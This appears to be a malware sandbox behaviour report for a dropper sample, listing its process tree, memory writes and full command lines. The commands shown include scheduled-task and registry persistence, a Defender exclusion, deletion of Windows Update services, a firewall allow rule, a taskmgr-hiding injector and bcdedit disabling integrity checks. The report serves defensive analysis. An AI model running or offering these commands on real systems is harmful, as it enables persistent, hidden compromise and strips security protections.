Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1664 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1664 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1664 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1664 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1664 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1664 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1664 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1664 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1664 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1664 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1664 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 800 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 800 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 800 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 800 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 800 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 364 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 364 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 364 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 364 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 364 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 364 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 800 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 800 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe

"C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe"

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Windows\system32\taskkill.exe

taskkill /IM chrome.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230626010155.log C:\Windows\Logs\CBS\CbsPersist_20230626010155.cab

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\taskeng.exe

taskeng.exe {0A549102-D269-4809-97AB-07951E1B4B15} S-1-5-21-3419557010-3639509551-242374962-1000:IULNABEW\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC

C:\Windows\system32\taskeng.exe

taskeng.exe {E350FEEF-DED4-4509-A1C6-23F983541D93} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Program Files\Notepad\Chrome\updater.exe

"C:\Program Files\Notepad\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

